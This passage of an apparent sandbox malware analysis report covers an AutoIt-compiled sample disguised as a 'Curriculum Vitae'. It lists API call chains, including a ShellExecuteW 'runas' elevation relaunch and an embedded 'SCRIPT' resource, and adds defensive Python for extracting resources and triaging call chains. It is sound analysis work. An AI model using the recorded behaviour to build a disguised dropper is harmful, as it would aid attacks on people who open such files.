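    raw_ptr = 0x200
    opt = struct.pack("<H", 0x10B).ljust(0x70, b"\0") + struct.pack("<II", rsrc_rva, len(rsrc))
    opt = opt.ljust(0xE0, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    sect = (b".rsrc".ljust(8, b"\0")
            + struct.pack("<IIII", len(rsrc), rsrc_rva, len(rsrc), raw_ptr)).ljust(40, b"\0")
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    return (dos + b"PE\0\0" + coff + opt + sect).ljust(raw_ptr, b"\0") + rsrc


# Constructed sample; the real sample's script blob is not on this page.
PAYLOAD = b"<constructed stand-in for the compiled script>"
SAMPLE_RVA = 0x3000
SAMPLE_RSRC = build_rsrc(SAMPLE_RVA, RT_RCDATA, "SCRIPT", PAYLOAD)
```

Against a real file, `extract_resource(*rsrc_section(data), RT_RCDATA, "SCRIPT")` returns the blob the runtime would hand to LockResource; a hit is a cheap static confirmation of the AutoIt runtime lookup seen in the listing and gives you the bytes to pass to an AutoIt decompiler.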

                      Control-flow Graph

                      APIs
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D32B6B
                        • Part of subcall function 00D33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E01418,?,00D32E7F,?,?,?,00000000), ref: 00D33A78
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00DF2224), ref: 00D72C10
                      • ShellExecuteW.SHELL32(00000000,?,?,00DF2224), ref: 00D72C17
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                      • String ID: runas
                      • API String ID: 448630720-4000483414
                      • Opcode ID: 4739aa6dfea50b4eda45e7dbce84148f243213e6e98f4ad197e3038eeb01558b
                      • Instruction ID: eef3bf791446222634fea5de7e0494bbc6c80e19b4793f425358f837ece57725
                      • Opcode Fuzzy Hash: 4739aa6dfea50b4eda45e7dbce84148f243213e6e98f4ad197e3038eeb01558b
                      • Instruction Fuzzy Hash: 041126316083466EC708FF64E892DBEB7A4DFD0300F48642CF286560A2DF718A49C732
                      APIs
                      • lstrlenW.KERNEL32(?,00D75222), ref: 00D9DBCE
                      • GetFileAttributesW.KERNELBASE(?), ref: 00D9DBDD
                      • FindFirstFileW.KERNELBASE(?,?), ref: 00D9DBEE
                      • FindClose.KERNEL32(00000000), ref: 00D9DBFA
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: FileFind$AttributesCloseFirstlstrlen
                      • String ID:
                      • API String ID: 2695905019-0
                      • Opcode ID: 2d10df61404a79ac074558d35c76b94b595ca74e5cb5abf32f7d6dad0d4febb5
                      • Instruction ID: 579ac297e6fdf8ec074170ee37dce227fea5a234d25899cb9efad89f6b57d72d
                      • Opcode Fuzzy Hash: 2d10df61404a79ac074558d35c76b94b595ca74e5cb5abf32f7d6dad0d4febb5
                      • Instruction Fuzzy Hash: 3AF0A030820A12578B206B78EC0D8AAB77D9E05334B184702F97AC22E0EBB0995586B9
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID:
                      • String ID: Variable is not of type 'Object'.$p#
                      • API String ID: 0-1086706999
                      • Opcode ID: dbd0ea02d0123b670a6dd03f58f0c8ef4b863f1ddbfb8e47898e50ee633b2e16
                      • Instruction ID: c44f38e3c981f614eb2717ad17b32f661f91eb8efba7e4f6d600e1856e117875
                      • Opcode Fuzzy Hash: dbd0ea02d0123b670a6dd03f58f0c8ef4b863f1ddbfb8e47898e50ee633b2e16
                      • Instruction Fuzzy Hash: 7F328A74910218DBCF14EF94D885AEDBBB5FF04304F189069E846BB292DB75AE49CB70
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: p#
                      • API String ID: 3964851224-4182048217
                      • Opcode ID: 546b8a15db8ee940f065b69cd3500cb0169012d52aca6f3634fde0c62fee452c
                      • Instruction ID: 40c71f6e9faa295261a20b52bfa8316e79b422cf99ae20c85c9dc9d1e76da3e9
                      • Opcode Fuzzy Hash: 546b8a15db8ee940f065b69cd3500cb0169012d52aca6f3634fde0c62fee452c
                      • Instruction Fuzzy Hash: 02A248746183418FC754DF18C480B2ABBE1FF89304F18996DE99A9B362D771EC45CBA2
                      APIs
                      • GetInputState.USER32 ref: 00D3D807
                      • timeGetTime.WINMM ref: 00D3DA07
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D3DB28
                      • TranslateMessage.USER32(?), ref: 00D3DB7B
                      • DispatchMessageW.USER32(?), ref: 00D3DB89
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D3DB9F
                      • Sleep.KERNEL32(0000000A), ref: 00D3DBB1
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                      • String ID:
                      • API String ID: 2189390790-0
                      • Opcode ID: ec8fd4a6dbd10a58e83287fd99262ba03fa992df06cefc01478b5c39d662e833
                      • Instruction ID: d4331190e1ba8333f4cf1e8399348496c2d106420f2375fc8b705901c4083a95
                      • Opcode Fuzzy Hash: ec8fd4a6dbd10a58e83287fd99262ba03fa992df06cefc01478b5c39d662e833
                      • Instruction Fuzzy Hash: 3842CE70604342EFD728DF24D884BBAB7A6FF45304F188559E596872A1D771E888CFB2
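The API listings above (the GetVersionExW/IsWow64Process/GetNativeSystemInfo architecture probe, the FindResourceExW lookup of the "SCRIPT" resource, the SetCurrentDirectoryW/GetModuleFileNameW/ShellExecuteW block with "runas" on its stack, and the GetInputState/timeGetTime/PeekMessageW/Sleep loop) are easier to triage as data than as bullets. The Python below is an added example, not Joe Sandbox code: it parses lines in the report's `API.MODULE(args), ref: addr` shape, keeps the "Part of subcall function" attribution, and matches each function's ordered call chain against a small rule table. The rule labels are this editor's reading of the chains, not the sandbox's signatures; for instance "runas" next to ShellExecuteW is the verb that requests elevation (a UAC prompt) when passed as lpOperation, and a timeGetTime/PeekMessageW/Sleep loop is a timed wait that keeps pumping messages, which is what a scripting runtime's sleep looks like and is not by itself evidence of anti-analysis. The sample text is copied from the listings above.

```python
"""Parse the per-function "APIs" listings of a sandbox report into records and
flag call chains an analyst would look at first.  Added example, not Joe Sandbox
code; RULES encode an analyst's reading of the listings, not sandbox signatures."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One report line, e.g.
#   • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D34466
#   • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]     # stack/argument values as printed, "?" where unknown
    ref: int                  # call-site address
    parent: Optional[str]     # subcall function the line was lifted from, if any


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API line in text; lines in any other shape are skipped."""
    calls = []
    for raw in text.splitlines():
        m = API_LINE.match(raw.strip().lstrip("•").strip())
        if m:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["parent"]))
    return calls


def is_subsequence(seq, sub) -> bool:
    """True if every item of sub occurs in seq in that order, gaps allowed."""
    it = iter(seq)
    return all(item in it for item in sub)


# (label, ordered API chain, optional predicate over the whole call list)
RULES = [
    ("WOW64-aware architecture probe with GetSystemInfo fallback",
     ("IsWow64Process", "LoadLibraryA", "GetProcAddress", "GetNativeSystemInfo"), None),
    ("locates an RT_RCDATA (type 0x0A) resource and maps it",
     ("FindResourceExW", "LoadResource", "SizeofResource", "LockResource"),
     lambda calls: any(c.api == "FindResourceExW" and "0000000A" in c.args for c in calls)),
    ("re-launches its own image via ShellExecuteW 'runas' (UAC elevation prompt)",
     ("GetModuleFileNameW", "ShellExecuteW"),
     lambda calls: any("runas" in c.args for c in calls)),
    ("timed wait that keeps pumping window messages",
     ("timeGetTime", "PeekMessageW", "Sleep"), None),
]


def match_rules(calls: List[ApiCall]) -> List[str]:
    """Labels of every rule whose chain (and predicate) matches this function's calls."""
    names = [c.api for c in calls]
    return [label for label, chain, pred in RULES
            if is_subsequence(names, chain) and (pred is None or pred(calls))]


# Listings copied from the report above (four functions of the same runtime).
ARCH_PROBE = r"""
• GetVersionExW.KERNEL32(?), ref: 00D3430D
  • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
• GetCurrentProcess.KERNEL32(?,00DCCB64,00000000,?,?), ref: 00D34422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00D34429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D34454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D34466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D34474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00D3447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 00D344A0
"""
SCRIPT_RESOURCE = r"""
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D350AA,?,?,00000000,00000000), ref: 00D342B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D350AA,?,?,00000000,00000000), ref: 00D342C9
• LoadResource.KERNEL32(?,00000000,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20), ref: 00D735BE
• SizeofResource.KERNEL32(?,00000000,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20), ref: 00D735D3
• LockResource.KERNEL32(00D350AA,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20,?), ref: 00D735E6
"""
RUNAS_RELAUNCH = r"""
• SetCurrentDirectoryW.KERNEL32(?), ref: 00D32B6B
  • Part of subcall function 00D33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E01418,?,00D32E7F,?,?,?,00000000), ref: 00D33A78
  • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,00DF2224), ref: 00D72C10
• ShellExecuteW.SHELL32(00000000,?,?,00DF2224), ref: 00D72C17
"""
TIMED_WAIT = r"""
• GetInputState.USER32 ref: 00D3D807
• timeGetTime.WINMM ref: 00D3DA07
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D3DB28
• TranslateMessage.USER32(?), ref: 00D3DB7B
• DispatchMessageW.USER32(?), ref: 00D3DB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D3DB9F
• Sleep.KERNEL32(0000000A), ref: 00D3DBB1
"""

if __name__ == "__main__":
    for name, text in [("arch", ARCH_PROBE), ("resource", SCRIPT_RESOURCE),
                       ("runas", RUNAS_RELAUNCH), ("wait", TIMED_WAIT)]:
        print(name, match_rules(parse_api_lines(text)))
```

Feeding a whole report's "APIs" sections through `parse_api_lines` and grouping by function gives one row per function with its rule hits, which is a faster first pass than reading fuzzy hashes; the `parent` field lets you keep lifted subcall lines apart from the function's own calls when a chain should not span them.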

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00D32D07
                      • RegisterClassExW.USER32(00000030), ref: 00D32D31
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D32D42
                      • InitCommonControlsEx.COMCTL32(?), ref: 00D32D5F
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D32D6F
                      • LoadIconW.USER32(000000A9), ref: 00D32D85
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D32D94
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 7d7e3b3aa30a5c0cbddeb4014c7b23af48a6724d7282c119c9d626d1ad4f1c71
                      • Instruction ID: 264de619fda7411df527050accb456bdef1b831b0815ce11c4ae558b122f3d8c
                      • Opcode Fuzzy Hash: 7d7e3b3aa30a5c0cbddeb4014c7b23af48a6724d7282c119c9d626d1ad4f1c71
                      • Instruction Fuzzy Hash: A821E2B1D1130AAFDB00DFA5E849B9DBBB4FB08700F10515AF615FA2A0D7B605888FA0

                      Control-flow Graph

                      [Rendered graph omitted; the executed/not-executed colouring is not recoverable from the text. Entry 302 d7065b-d7068b (calls d7042f); 313 d706cb-d70714 and 331 d70727-d70754 call d7039a, whose CreateFileW is listed below; 321 d70781-d7078a GetFileType. Error paths: 325 d70756-d7077c GetLastError → __dosmaperr, 328 d7078c-d707bd GetLastError → __dosmaperr → CloseHandle, and 365 d70931-d7095d GetLastError → __dosmaperr; 361 d708fc-d7092f CloseHandle then calls d7039a again. All paths converge on 322 d7097d-d70983.]
                      APIs
                        • Part of subcall function 00D7039A: CreateFileW.KERNELBASE(00000000,00000000,?,00D70704,?,?,00000000,?,00D70704,00000000,0000000C), ref: 00D703B7
                      • GetLastError.KERNEL32 ref: 00D7076F
                      • __dosmaperr.LIBCMT ref: 00D70776
                      • GetFileType.KERNELBASE(00000000), ref: 00D70782
                      • GetLastError.KERNEL32 ref: 00D7078C
                      • __dosmaperr.LIBCMT ref: 00D70795
                      • CloseHandle.KERNEL32(00000000), ref: 00D707B5
                      • CloseHandle.KERNEL32(?), ref: 00D708FF
                      • GetLastError.KERNEL32 ref: 00D70931
                      • __dosmaperr.LIBCMT ref: 00D70938
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                      • String ID: H
                      • API String ID: 4237864984-2852464175
                      • Opcode ID: 420697560b515d995d6eb0e536851a07fd6f0bddb2e36abf0782d8f8ee803e56
                      • Instruction ID: e2aed2daf01b4ade595c3d89c46e406b091ad337e6d77f8b358956bd03c1b6b0
                      • Opcode Fuzzy Hash: 420697560b515d995d6eb0e536851a07fd6f0bddb2e36abf0782d8f8ee803e56
                      • Instruction Fuzzy Hash: 3DA10532A101458FDF19AF68D851BAD3FA0EB06320F18815DF859EB3D1EB319856CBB1

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00D33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E01418,?,00D32E7F,?,?,?,00000000), ref: 00D33A78
                        • Part of subcall function 00D33357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D33379
                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D3356A
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D7318D
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D731CE
                      • RegCloseKey.ADVAPI32(?), ref: 00D73210
                      • _wcslen.LIBCMT ref: 00D73277
                      • _wcslen.LIBCMT ref: 00D73286
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                      • API String ID: 98802146-2727554177
                      • Opcode ID: d3e1801a8be7ec8a7d3f0749d5dc5acdd9b8f18d06295ce9bd9d31e8f713896c
                      • Instruction ID: 566a2ec258d99a95cacb3c5fba53359af14c2fb564ecd680ac05c978405c0395
                      • Opcode Fuzzy Hash: d3e1801a8be7ec8a7d3f0749d5dc5acdd9b8f18d06295ce9bd9d31e8f713896c
                      • Instruction Fuzzy Hash: 397191714043029EC314EF66DC8695BB7E8FF94340F44542EF689A31A1EB799A88CB72

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00D32B8E
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00D32B9D
                      • LoadIconW.USER32(00000063), ref: 00D32BB3
                      • LoadIconW.USER32(000000A4), ref: 00D32BC5
                      • LoadIconW.USER32(000000A2), ref: 00D32BD7
                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D32BEF
                      • RegisterClassExW.USER32(?), ref: 00D32C40
                        • Part of subcall function 00D32CD4: GetSysColorBrush.USER32(0000000F), ref: 00D32D07
                        • Part of subcall function 00D32CD4: RegisterClassExW.USER32(00000030), ref: 00D32D31
                        • Part of subcall function 00D32CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D32D42
                        • Part of subcall function 00D32CD4: InitCommonControlsEx.COMCTL32(?), ref: 00D32D5F
                        • Part of subcall function 00D32CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D32D6F
                        • Part of subcall function 00D32CD4: LoadIconW.USER32(000000A9), ref: 00D32D85
                        • Part of subcall function 00D32CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D32D94
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: c400ed7174fab342a53158637c63b21ab90278d79d21e2dcabc7e2300fedd1e1
                      • Instruction ID: 5c3bf32de96a820edd8e44b3b4d5a7d3173e1f41b4912bdc1f6fbaabd0be4c82
                      • Opcode Fuzzy Hash: c400ed7174fab342a53158637c63b21ab90278d79d21e2dcabc7e2300fedd1e1
                      • Instruction Fuzzy Hash: 90212A70E10315AFDB109F96EC45BA97FB4FB08B50F15009AE604BA7A0D7BA05848F90
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 00D3BB4E
                      Strings
                      Memory Dump Source: as for the first function above (same .sdmp files and IDA snapshot)
                      Similarity
                      • API ID: Init_thread_footer
                      • String ID: p#$p#$p#$p#$p%$p%$x#$x#
                      • API String ID: 1385522511-4136154834
                      • Opcode ID: e61c622b9777b5d7fa62a2736195a838c29c6b496bc5d6827e87cfa422f7c705
                      • Instruction ID: 38d90a93ea3e3735121d80d5c0c7fd8ee09ab294e4225b148f0d16bb4bd2337c
                      • Opcode Fuzzy Hash: e61c622b9777b5d7fa62a2736195a838c29c6b496bc5d6827e87cfa422f7c705
                      • Instruction Fuzzy Hash: DE32CF74A00209DFDB24DF54C898BBEBBB5EF44320F18805AEA45AB251C775ED85CBB1

                      Control-flow Graph

                      [Rendered graph omitted; the executed/not-executed colouring is not recoverable from the text. Message-dispatch blocks with API calls: 656 d331d0-d331d8 DefWindowProcW (the common fall-through); 659 d33265-d3326d PostQuitMessage; 668 d33201-d33214 KillTimer (then calls d330f2, d33c50); 664 d3321d-d33244 SetTimer, RegisterWindowMessageW → 671 d33246-d33251 CreatePopupMenu; 676 d72dd7-d72df6 MoveWindow; 687 d72dc6-d72dd2 SetFocus. The procedure returns via 661 d331de-d331e4, directly from 656 and otherwise through 662 d33219-d3321b.]
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D3316A,?,?), ref: 00D331D8
                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00D3316A,?,?), ref: 00D33204
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D33227
                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D3316A,?,?), ref: 00D33232
                      • CreatePopupMenu.USER32 ref: 00D33246
                      • PostQuitMessage.USER32(00000000), ref: 00D33267
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated
                      • API String ID: 129472671-2362178303
                      • Opcode ID: 3c729362326f06c62be7bb1db09f0b430e76b1a250a4d7f0f1455f1916e04de3
                      • Instruction ID: 0ad25c3102c35707eb900510544dad92a44e3afcd5931f27c5a6f27fc0076ef9
                      • Opcode Fuzzy Hash: 3c729362326f06c62be7bb1db09f0b430e76b1a250a4d7f0f1455f1916e04de3
                      • Instruction Fuzzy Hash: 73417A35610301AFDB141B789F0EB7E3A18E745340F085125F64AEA2E1DB76CE84D7B5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                      • API String ID: 0-2799515523
                      • Opcode ID: 82e4fc258dfda841acfe53d2ec248f905f06f1822d47eaea832281a33e8575d3
                      • Instruction ID: 70e187ffb3dc7eed4f0f3cd44cc4625a92b71fe93bbca6534cbfcf0f7e800dfe
                      • Opcode Fuzzy Hash: 82e4fc258dfda841acfe53d2ec248f905f06f1822d47eaea832281a33e8575d3
                      • Instruction Fuzzy Hash: 7EC26671A00215CFCB24DF98C885AADB7B1FB09710F288569E946AB3E1D375ED41CBB1

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b851c8c34edf5859350e20679be43f921b340c7430023ef5ff396f3b87b4d2fb
                      • Instruction ID: ac30a4a96e9ca1807bf6a2f0fc0d735c2295c9003530cfc066e3cd5111851bdb
                      • Opcode Fuzzy Hash: b851c8c34edf5859350e20679be43f921b340c7430023ef5ff396f3b87b4d2fb
                      • Instruction Fuzzy Hash: 02C100B4A04349AFCF11DFA8D851BADBBB8AF49310F084199F955AB392CB318945DB70

                      Control-flow Graph

                      APIs
                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03BB2691
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03BB28B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                      • Instruction ID: 6c939b5900b86af61d5923b707b7bea61a93e4dc198b3471fb1d484693219384
                      • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                      • Instruction Fuzzy Hash: ABA10874E00209EBDB14CFA4C894BFEB7B5FF48308F1485A9E515BB280DBB59A41CB95

                      Control-flow Graph

                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D32C91
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D32CB2
                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D31CAD,?), ref: 00D32CC6
                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D31CAD,?), ref: 00D32CCF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: 2c610cca729f0e43f4dc20ff319e8c4bf4cdfe47026ae0cdf3f1c6d9ddd14c22
                      • Instruction ID: 8f7cd0c073b18bdd20fb69b8ad927e6598789c3b49364d7e65dd1a30fcc13b7a
                      • Opcode Fuzzy Hash: 2c610cca729f0e43f4dc20ff319e8c4bf4cdfe47026ae0cdf3f1c6d9ddd14c22
                      • Instruction Fuzzy Hash: A3F017755503917EEB210713AC08F7B2EBDD7C6F50B02109EFA04AB2A0C67A0888DAB0

                      Control-flow Graph

                      APIs
                        • Part of subcall function 03BB22A0: Sleep.KERNELBASE(000001F4), ref: 03BB22B1
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03BB24B2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: 9BSP60ZTBMBFRBH
                      • API String ID: 2694422964-4072201684
                      • Opcode ID: 832895546e6ba0d144f226aaaab2fecb49410c677f65140a3353a12e622cc59b
                      • Instruction ID: 7d1f4deb6b7504b324d20a7808de3b480d65fb16995e54372efa88d3687adfc7
                      • Opcode Fuzzy Hash: 832895546e6ba0d144f226aaaab2fecb49410c677f65140a3353a12e622cc59b
                      • Instruction Fuzzy Hash: 49517471D14259EAEF11DBA4C814BEFBB74AF44304F0045A9E608BB2C0DBB91B45CBA5

                      Control-flow Graph

                      APIs
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA2C05
                      • DeleteFileW.KERNEL32(?), ref: 00DA2C87
                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DA2C9D
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA2CAE
                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA2CC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
